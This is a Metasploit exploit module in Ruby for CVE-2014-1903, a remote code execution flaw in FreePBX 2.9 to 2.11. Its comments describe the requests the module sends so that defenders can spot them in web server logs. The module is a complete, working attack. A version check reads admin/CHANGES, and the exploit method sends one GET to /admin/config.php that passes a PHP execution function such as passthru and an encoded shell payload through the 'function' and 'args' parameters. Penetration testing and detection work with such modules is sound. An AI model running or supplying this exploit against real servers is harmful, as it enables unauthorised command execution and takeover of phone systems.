
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/freepbx_config_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for CVE-2014-1903. Per its own description, FreePBX 2.9,
# 2.10 and 2.11 accept arbitrary PHP function names and arguments through the
# "function" and "args" parameters of /admin/config.php.
#
# Requests this module sends (what to look for in web server access logs):
#   * check   - one GET for <TARGETURI>/admin/CHANGES
#   * exploit - one GET for <TARGETURI>/admin/config.php whose query string
#               carries handler=api, a random lowercase "display" value of
#               5 to 14 letters, and the "function" / "args" pair
#
# The vendor issue listed under 'References' (FREEPBX-7123) is the place to
# confirm which releases carry the fix.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and its two options:
  #   TARGETURI - base path of the FreePBX installation (default '/')
  #   PHPFUNC   - advanced option naming the PHP function placed in the
  #               "function" parameter (default 'passthru'); because it is
  #               operator-configurable, log-based detection should not key
  #               on a single function name
  def initialize(info = {})
    module_info = {
      'Name' => "FreePBX config.php Remote Code Execution",
      'Description' => %q{
        This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.
        It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php"
        parameters "function" and "args".
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'i-Hmx', # Vulnerability discovery
        '0x00string', # PoC
        'xistence <xistence[at]0x90.nl>' # Metasploit module
      ],
      'References' => [
        ['CVE', '2014-1903'],
        ['OSVDB', '103240'],
        ['EDB', '32214'],
        ['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123']
      ],
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Targets' => [
        ['FreePBX', {}]
      ],
      'Privileged' => false,
      'DisclosureDate' => '2014-03-21',
      'DefaultTarget' => 0
    }
    super(update_info(info, module_info))

    register_options(
      [OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/'])]
    )

    register_advanced_options(
      [OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru'])]
    )
  end

  # Version-based check only: fetches admin/CHANGES and inspects its first
  # line. No request is made to config.php here.
  #
  # Returns:
  #   CheckCode::Unknown - no response, a non-200 status, or no match on the body
  #   CheckCode::Appears - the first line contains 2.9.0, 2.10.0 or 2.11.0
  #   CheckCode::Safe    - any other first line
  #
  # Caveats for anyone relying on this result:
  #   * Removing or blocking the CHANGES file yields Unknown, not Safe; it
  #     says nothing about whether config.php is still exposed.
  #   * The version pattern is unanchored, so it matches any line that merely
  #     contains one of those substrings.
  #   * NOTE(review): whether a patched install still reports a matching
  #     version string cannot be told from this file - confirm before
  #     treating Appears as proof of exposure.
  def check
    vprint_status("Trying to detect installed version")

    request = {
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "admin", "CHANGES")
    }
    res = send_request_cgi(request)

    # ^...$ are per-line anchors, so the capture is the first line of the body.
    got_first_line = res && res.code == 200 && res.body =~ /^(.*)$/
    return Exploit::CheckCode::Unknown unless got_first_line

    version = Regexp.last_match(1)
    vprint_status("Version #{version} detected")

    return Exploit::CheckCode::Safe unless version =~ /2\.(9|10|11)\.0/

    Exploit::CheckCode::Appears
  end

  # Sends the single GET request described in the class comment. The
  # "function" value comes from the PHPFUNC option and "args" carries the
  # encoded command payload; "display" is random filler.
  def exploit
    rand_data = rand_text_alpha_lower(5 + rand(10))

    print_status("Sending payload")
    request = {
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "admin", "config.php"),
      'vars_get' => {
        "display" => rand_data,
        "handler" => "api",
        "function" => datastore['PHPFUNC'],
        "args" => payload.encoded
      }
    }
    res = send_request_cgi(request)

    # A response with any status other than 200 is reported as a probable
    # failure. A missing response (nil) is not reported at all.
    print_error("Unexpected response, exploit probably failed!") if res && res.code != 200
  end
end